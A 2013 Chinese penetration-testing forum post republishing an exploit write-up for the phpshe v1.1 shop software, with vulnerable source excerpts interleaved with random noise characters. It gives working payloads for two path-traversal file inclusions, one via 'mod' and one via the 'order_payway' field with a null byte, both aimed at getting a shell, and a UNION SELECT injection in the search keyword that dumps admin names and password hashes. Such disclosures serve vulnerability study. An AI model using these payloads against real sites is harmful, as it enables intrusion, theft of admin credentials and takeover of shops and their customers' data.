找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 3161|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/. s4 b- a! J" m: C, t1 B" x( D
/* Phpshe v1.1 Vulnerability7 g( _2 P  Z! @$ M0 n3 W
/* ========================
" y' e) y3 |9 T: I/ O  `3 b5 @4 \/* By: : Kn1f36 R  S) a+ p$ i# o
/* E-Mail : 681796@qq.com" q) ]9 h7 i' ]) L
/*******************************************************/
  c/ T$ H. w0 C$ f4 e  l0×00 整体大概参数传输4 Y+ S4 ?' \6 _2 ^# ]
* }  `4 L( c2 f3 ^  R) T6 g! P
' `/ V; i' Z5 Q8 t8 s
( R/ h( U5 o/ ~' X
//common.php
3 h: t% _- T. a7 iif (get_magic_quotes_gpc()) {7 x2 @. A5 h7 X1 U) m7 U) X
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
* C, C  j( [7 z8 T, I  O!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');! a2 B* u- |* p) `2 W8 |1 i- F
}
& u9 u8 t# M7 b6 y$ P) L; I7 belse {! M! s* W+ R/ x7 ]2 s% {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');1 D5 u7 p. W. ~5 G) k0 I: H
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
( r3 k' M, C/ _1 B0 T$ L6 Q; s}
3 I! {' s) _( p1 S8 Jsession_start();5 \% t; F: U& [( K+ c
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');& u: u$ o  _+ m  b
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
; O. F$ Z6 u. Y3 r6 [$ J. j, n; A2 S! _" T4 b
0×01 包含漏洞
1 U6 ], `( a5 m
: A- y+ W% U% t! `$ g* {  d) j$ m3 [1 d
//首页文件
( v3 l# R- K9 F4 Y<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
0 _2 g, }7 c3 R7 E, W% g8 ~* v: pinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
* }1 j' y8 G; }pe_result();
% p3 B) S0 U* D" Y- S?>. `0 ~' g. p  z* ?5 A
//common 文件 第15行开始
$ c  d7 A# y: Eurl路由配置$ [' n, G0 c6 T& \* `0 t8 L$ }* f1 a# V
$module = $mod = $act = 'index';8 W2 O0 J; N0 g- _% i+ a
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
* B  V' }& l) L. B9 ~$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);- S7 G) w9 ^# n* w( k4 }* L
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);) V- l7 d, e! r2 ]0 z$ J
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
: T* C7 V+ E3 \/ g' j* r

6 P; \2 u' X# J5 b  b- ]

$ J8 w# S0 c' R1 A! }% t9 h" b 0×02 搜索注入# S- q. d8 r" q. F; l, D

. F1 c$ L1 b- w( W0 P3 o<code id="code2">

//product.php文件8 ?) h( \# N) v$ Z
case 'list':  ^7 Z) l+ `* w6 ^+ O
$category_id = intval($id);" u. A% k& f! B6 _( F) G
$info = $db->pe_select('category', array('category_id'=>$category_id));) L3 q! [3 K- |1 Z
//搜索
, }4 ]5 J& g- c: C$ w: ^, A7 V$sqlwhere = " and `product_state` = 1";' O$ d! G& `$ o5 N# V! D8 q
pe_lead('hook/category.hook.php');
. f; ?+ L+ l# N7 Z4 B( X0 eif ($category_id) {
  }. t5 n! z+ h7 _7 ywhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";; F* Y8 }2 X$ p3 [
}5 y; N; i- e- t* n1 U( y- r3 L! U! B
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤) F: {  m9 q$ S* y" e2 A& ~' I
if ($_g_orderby) {
0 x+ r+ t( y: T# ~' J; N) n$orderby = explode('_', $_g_orderby);) L( R1 T- I1 a, q/ t/ S5 L- o* D$ ~
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";" d- ?6 `4 S9 m2 Y8 h' \
}; D$ T) @+ R2 S. ]$ M
else {
" Z, Z4 e% P) [' H8 C0 X8 d3 O6 ?5 A; W$sqlwhere .= " order by `product_id` desc";
4 E6 I; _1 V( B9 I+ T6 J}
- o$ W4 U( R) M( q* D6 a$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
. t$ \, ^1 n; g3 o! e. {& I//热卖排行
5 G2 d9 a! ~% X$product_hotlist = product_hotlist();
/ j8 F1 n+ H; X: _) B: ]//当前路径
; D: \9 Y9 }$ `$nowpath = category_path($category_id);
7 J. X" |! z8 [8 j$ B! L$seo = pe_seo($info['category_name']);6 F0 h% O2 D/ R0 t8 z3 I& R! l: S- a; v( z
include(pe_tpl('product_list.html'));* z; d4 u2 r1 L0 q+ f. P
//跟进selectall函数库
# f; w, }0 G" ^& n2 a$ Upublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())/ h2 a' \) X# }7 ~/ i1 |
{3 w% _) A5 R! |" G+ w9 h
//处理条件语句  P, }% I7 p, P4 K
$sqlwhere = $this->_dowhere($where);6 U) P" u  s2 k% f$ ?
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);; {4 k  e( f3 N0 v7 |! M- Q- s
}
! l! e8 O* Y1 \//exp/ K2 X  ~0 `) e  {
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1- ^3 f  [' Z, n. ]

</code>" Q0 \0 _) R' }
! L1 ~! e( u4 T+ E1 O5 n
0×03 包含漏洞20 G3 p& L# _/ k: F: N& \
1 E* [7 b$ a. d6 O0 T; y: W
<code id="code3">

//order.php

case 'pay':


* _. B% @3 h( N6 n3 m; o6 l$order_id = pe_dbhold($_g_id);


0 s0 O; p( t0 W& z+ W$cache_payway = cache::get('payway');


1 R( ^& P' e1 [# Xforeach($cache_payway as $k => $v) {

. u- `9 Z% Z% Y
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

5 L6 X0 Z7 U4 S8 i* u* p9 G
if ($k == 'bank') {

6 I. y/ X, Y$ T- V8 N2 C2 e) s
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

5 Q+ a( U: c/ a3 C
}


6 Z% G+ f+ U( Y: g}

; M; A. o! H2 L9 a
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

- J2 T& u; g: b+ |' ?
!$order['order_id'] && pe_error('订单号错误...');

. r: l% Y7 J% q; [' ]! a$ ?8 U
if (isset($_p_pesubmit)) {


5 a; A0 V# b' t( Q# r4 a9 h- E3 ?if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


, k( J6 c/ d; C2 K7 G$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


  W+ U" t) p, L9 ~% C& h( @foreach ($info_list as $v) {


. r- u1 i7 C5 _5 q( @$order['order_name'] .= "{$v['product_name']};";
2 ]) y  i4 c8 r1 a* v6 V' p

7 ]% M, D- q2 S0 k) A8 `9 H5 ?0 Y
}

2 u  B6 x4 _) Y! B( K
echo '正在为您连接支付网站,请稍后...';


+ b$ ]" g0 h, r  g- D$ Z) f, _include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

$ ]/ ^, N: z) D
}//当一切准备好的时候就可以进行"鸡肋包含了"

  z: G& I/ ~0 m7 k
else {


* P$ Z( d& d& s2 ope_error('支付错误...');


" k# r  g" g8 l- D% P2 l. `}

( E% r4 y  R  u9 w5 H1 ^
}


6 r+ A! o8 k) o4 S5 B$seo = pe_seo('选择支付方式');


/ E9 u) n6 P' J+ |2 G6 R1 T! |include(pe_tpl('order_pay.html'));


) o' w( w4 v2 R' z1 k' Z6 Y- d) |break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>* m" l6 Y7 }2 q% b$ f! b
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表